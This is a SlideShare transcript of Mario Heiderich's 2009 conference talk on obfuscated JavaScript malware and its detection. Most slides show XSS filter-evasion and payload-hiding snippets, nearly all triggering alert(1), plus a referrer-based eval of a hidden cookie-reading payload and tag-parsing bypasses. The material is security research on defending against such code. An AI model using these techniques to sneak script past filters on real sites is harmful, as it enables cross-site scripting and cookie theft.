JavaScript From Hell - CONFidence 2.0 2009
19 likes21,961 views
This document summarizes Mario Heiderich's talk on obfuscated JavaScript malware. The talk covered the history of JavaScript and how it has evolved from being frowned upon due to security issues to becoming essential for modern web applications. It then discussed how JavaScript is commonly used in malware through techniques like string obfuscation, eval injection, and hiding payloads in the DOM. The talk concluded by exploring how obfuscation could become even more advanced using new JavaScript features and discussed challenges in detecting obfuscated malware.
![Examples
● µ = self ['x61lert'], µ(1)
● location['href']=
'javascript:u0061l'+
String.fromCharCode(101)+'rt(1)'
● top[<>alert</>](1)
● eval(unescape('%61')+/lert(1)/[-1])](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-10-320.jpg)
![Examples
●
Using regular expressions as functions
● (/padding/)(/payload/)
●
DOM Objekte can be functions too
● !location(payload)
●
Destructuring assignment
● [,,padding]=[,,payload]
● [,location]=[,'javascript:alert(1)']
● [,a,a(1)]=[,alert]](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-15-320.jpg)
![More Examples
●
Execute code without parenthesis
● {x:window.onunload=alert}
● ''+{toString:alert}
●
Prototypes and call()
● (1,[].sort)()[[].join.call('at','ler')](1)
●
Empty return values
● {x:top['al'+new Array+'ert'](1)}](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-16-320.jpg)
![Advanced String Obfuscation
●
Generate strings from multibyte characters
● String.charCodeAt(' 朱 ').toString(16)
●
Generate strings from numbers
● top[(Number.MAX_VALUE/45268).toString(36)
.slice(15,19)]
((Number.MAX_VALUE/99808).toString(36)
.slice(71,76)+'("XSS")')
●
Reverse base64
● window['a'+btoa(' êí')](1)•](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-17-320.jpg)
![The Code
●
Generating strings from RGB color values
function a() {
c=document.getElementById("c"),x=c.getContext("2d"),
i=document.getElementById("i")
x.drawImage(i, 0, 0),d=x.getImageData(0, 0, 3, 3),
p=''
for(y in d.data) {
if(d.data[y] > 0 && d.data[y] < 255) {
p+=String.fromCharCode(d.data[y])
}
}
eval(p)
}](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-19-320.jpg)
![Or even more
●
CSS color values, background URIs etc. etc.
● document.styleSheets[0].cssRules[0]...
●
Using image binaries to hide payload
●
Canvas helps a lot
● escape(atob(document.createElement('canvas')
.toDataURL('image/jpeg').slice(23)))](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-20-320.jpg)
![Payload via TinyURL
●
Payload from base64-ed URL suffix
●
Hidden in the referrer
●
http://tinyurl.com/YWxlcnQoZG9jdW1lbnQuY29va2llKQ
● eval(atob(document.referrer.split(///)[3]))](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-22-320.jpg)
![Strings made out of Nothing
●
AKA No-Alnum Scene“ :)„
●
Up- and downcast
●
{}+'' becomes „[object Object]“
●
!''+'' becones „false“
●
-~'' becomes 1 and -~-~'' becoms 2](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-23-320.jpg)
![Retrieving DOM Objects
●
Hard to detect payload execution
●
Payload hidden in DOM variables
●
Examples
● (1,[]['sort'])()['alert'](1)
● [].constructor.constrcutor()()['alert'](1)](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-24-320.jpg)
![Constructors and More
●
Some examples
●
Perfect for testing against sandboxes
● /./.__proto__.__proto__.constructor(alert)(1)
● Text.constructor([alert][0])(1)
● Window.__parent__[/alert/.source](1)
● Attr.__proto__.constructor.apply(0,[alert])(1)
● XULCommandEvent.__parent__](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-25-320.jpg)
![Example
●
Own prototype
● y=[[x=btoa('alert(1)')]
+''.split('',x.length),z=''];
for(var i in top) z+=btoa(i+top[i]
+Math.random(delete y[0]))
for(var i=0;i<x.length;i++)
y.push('z['+z.indexOf(x[i])+']')
eval('eval(atob('+y.join('+').slice(2)+'))')](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-28-320.jpg)
![Examples
●
Expression Closures
● (function()alert(1))()
● (function($)$(1))(alert)
●
Generator Expressions
● for([]in[$=alert])$(2)
● $=[(alert)for([]in[0])][0],$(1)
●
Iterators
● Iterator([$=alert]).next()[1],$(1)](https://image.slidesharecdn.com/jsfhen-091122040909-phpapp02/85/JavaScript-From-Hell-CONFidence-2-0-2009-34-320.jpg)
![[야생의 땅: 듀랑고] 서버 아키텍처 Vol. 2 (자막)](https://cdn.slidesharecdn.com/ss_thumbnails/vol2-160427160825-thumbnail.jpg?width=560&fit=bounds)
Ad
More Related Content
What's hot (20)
Similar to JavaScript From Hell - CONFidence 2.0 2009 (20)
Ad
More from Mario Heiderich (14)
Ad
Recently uploaded (20)
JavaScript From Hell - CONFidence 2.0 2009
- 1. JavaScript From Hell A Talk by Mario Heiderich Confidence 2.0 Warsaw 2009 AD
- 2. The Talk ● Unfriendly JavaScript ● A short travel in time ● Obfuscation today ● Possible counter measures ● The future
- 3. Credits First ● Gareth Heyes (buy him a beer – here's here rite now) ● Eduardo Vela ● David Lindsay ● Yosuke Hasegawa ● And many others...
- 4. History Lessons ● The origin of JavaScript in 1995 ● Netscape Navigator 2.0 ● LiveScript ● ECMA 262 ● JScript ● Implementations and Revisions ● Browserwars
- 5. Shadowy Existence ● Frowned upon for a long time same with cookies :) ● Users trained for switching off JavaScript ● Vulnerable browsers ● Spam, Phishing, Malware ● Until a renaissance took place...
- 6. Renaissance ● The “New Web“ ● Websites become applications ● Rich Internet Applications ● Widgets and other out-of-band applications ● XMLHttpRequest paves the way ● AJAX and the Web 2.0
- 7. Today ● JavaScript and JScript moved closer ● ActionScript and other implementations ● V8, SpiderMonkey, Tamarin... first IE9 versions soon to come ● JavaScript 1.7, 1.8, 1.8.1 and 2.0 ● Complex and super-dynamic scripting language ● Almost irreplace for modern webapps
- 8. JavaScript and Bad-Ware ● JavaScript and browser exploits ● Websites from Hell ● JavaScript in PDFs ● XSS, CSRF and client side SQLI ● NoScript, IE8 XSS Filter, Webkit XSS Filter ● Content Matching, Live-Deobfuscation, Sandboxing
- 9. String obfuscation ● It's full of evals ● eval(), execScript(), Function(), Script() ● _FirebugConsole.evaluate() ● Entities, special chars and shortcuts ● XOR, “Encryption“ and Base64 ● Examples
- 10. Examples ● µ = self ['x61lert'], µ(1) ● location['href']= 'javascript:u0061l'+ String.fromCharCode(101)+'rt(1)' ● top[<>alert</>](1) ● eval(unescape('%61')+/lert(1)/[-1])
- 11. Solutions? ● String obfuscation easy to break ● Pattern analysis ● Sandboxing ● External tools like Malzilla, Hackvertor ● Code analysis w/o execution ● toSource(int formatting)
- 12. A small Crash-Course ● Take some heavily obfuscated code ● Maybe generated by commercial obfuscators ● Break it ● Realize string obfuscation can't work ● Demo
- 13. Let's do this ● https://www.2checkout.com/static/checkout/javascript/us ● u0009 f{f`9#evm`wjlu006d+slu0070pjaofp*#x u0075bo8u0009~#`bw`k#+f*u0023x#~u0009~ qfwvqm#!!8 u007e/ u0009 olbg@lnsp9#evmu0060wjlm+*#x ● Deobfuscation in FireBug ● a=function(){%code%} ● a.toSource(1) ● Replace last eval by an alert
- 14. Limitations and alternatives ● String Obfuscated Code == clear text ● As long as we have an eval ● Alternatives ● Changing the code structure ● Use browser and implementation bugs ● Use less-/undocumented features
- 15. Examples ● Using regular expressions as functions ● (/padding/)(/payload/) ● DOM Objekte can be functions too ● !location(payload) ● Destructuring assignment ● [,,padding]=[,,payload] ● [,location]=[,'javascript:alert(1)'] ● [,a,a(1)]=[,alert]
- 16. More Examples ● Execute code without parenthesis ● {x:window.onunload=alert} ● ''+{toString:alert} ● Prototypes and call() ● (1,[].sort)()[[].join.call('at','ler')](1) ● Empty return values ● {x:top['al'+new Array+'ert'](1)}
- 17. Advanced String Obfuscation ● Generate strings from multibyte characters ● String.charCodeAt(' 朱 ').toString(16) ● Generate strings from numbers ● top[(Number.MAX_VALUE/45268).toString(36) .slice(15,19)] ((Number.MAX_VALUE/99808).toString(36) .slice(71,76)+'("XSS")') ● Reverse base64 ● window['a'+btoa(' êí')](1)•
- 19. The Code ● Generating strings from RGB color values function a() { c=document.getElementById("c"),x=c.getContext("2d"), i=document.getElementById("i") x.drawImage(i, 0, 0),d=x.getImageData(0, 0, 3, 3), p='' for(y in d.data) { if(d.data[y] > 0 && d.data[y] < 255) { p+=String.fromCharCode(d.data[y]) } } eval(p) }
- 20. Or even more ● CSS color values, background URIs etc. etc. ● document.styleSheets[0].cssRules[0]... ● Using image binaries to hide payload ● Canvas helps a lot ● escape(atob(document.createElement('canvas') .toDataURL('image/jpeg').slice(23)))
- 21. Talking about Canvas ● Get binary same-domain image data via JavaScript ● Making use of the toDataURL() method ● Like this ● document.createElement('canvas') .toDataURL('image/jpeg') ● Think Captcha – or just plain payload obfuscation
- 22. Payload via TinyURL ● Payload from base64-ed URL suffix ● Hidden in the referrer ● http://tinyurl.com/YWxlcnQoZG9jdW1lbnQuY29va2llKQ ● eval(atob(document.referrer.split(///)[3]))
- 23. Strings made out of Nothing ● AKA No-Alnum Scene“ :)„ ● Up- and downcast ● {}+'' becomes „[object Object]“ ● !''+'' becones „false“ ● -~'' becomes 1 and -~-~'' becoms 2
- 24. Retrieving DOM Objects ● Hard to detect payload execution ● Payload hidden in DOM variables ● Examples ● (1,[]['sort'])()['alert'](1) ● [].constructor.constrcutor()()['alert'](1)
- 25. Constructors and More ● Some examples ● Perfect for testing against sandboxes ● /./.__proto__.__proto__.constructor(alert)(1) ● Text.constructor([alert][0])(1) ● Window.__parent__[/alert/.source](1) ● Attr.__proto__.constructor.apply(0,[alert])(1) ● XULCommandEvent.__parent__
- 26. RTL/LTR Obfuscation ● RTL/LTR Characters can be utilized to completely destroy the code readability ● Hard to spot – and many variations
- 27. Morphing Code ● Code changes each time being delivered ● JavaScript generates morphing JavaScript ● Payload source again is the DOM ● Base64 from document.body.innerHTML ● Looping over window ● etc. etc..
- 28. Example ● Own prototype ● y=[[x=btoa('alert(1)')] +''.split('',x.length),z='']; for(var i in top) z+=btoa(i+top[i] +Math.random(delete y[0])) for(var i=0;i<x.length;i++) y.push('z['+z.indexOf(x[i])+']') eval('eval(atob('+y.join('+').slice(2)+'))')
- 29. Another Example ● Gareth Heyes' Hackvertor ● http://www.businessinfo.co.uk/labs/hackvertor/hackverto
- 30. How to detect? ● Almost impossible ● Payload stays hidden even if the trigger was found ● Sandboxing and runtime-analysis ● See NoScript and others ● Limitations and new risks ● Attacks against the sandbox, data leakage, DoS
- 32. PoC!
- 33. JavaScript of tomorrow ● More features ● Even more dynamic and slim code ● Let Statements, Generator Expressions, more native data types, XML, more DOM objects and methods ● Operator overloading ● Operator Object, first drafts around for quite some time
- 34. Examples ● Expression Closures ● (function()alert(1))() ● (function($)$(1))(alert) ● Generator Expressions ● for([]in[$=alert])$(2) ● $=[(alert)for([]in[0])][0],$(1) ● Iterators ● Iterator([$=alert]).next()[1],$(1)
- 35. The User Agents ● Native Client ● WebGL ● WebOS using Google FS and seemlessly integrated Chrome ● DOM Storage and file system access ● Back to the fat client
- 36. Coming up ● Malware still using rather immature techniques ● String obfusc. all over the place ● Generators for really obfuscated code ● A challenge for WAF vendors and AVs ● More code analysis and sandboxing
- 37. Questions and Comments ● Feedback welcome ● Even after talk and event ● [email protected] ● http://mario.heideri.ch ● http://twitter.com/0x6D6172696F
- 38. Goodies! ● Weird labels in Opera ● <script>=alert;(1)</script>͞ ͞ ● <script> =alert,0? =1: (2)</script>⌃․ ․ ⌃․ ● <script>ۘ=alert,ۘ(3)</script> ● A Firefox special - tags inside closing tags ● No > is used to close a tag for FF – enabling this; ● </p/<img/src=! onerror=alert(1)>
- 39. Thank you very much :)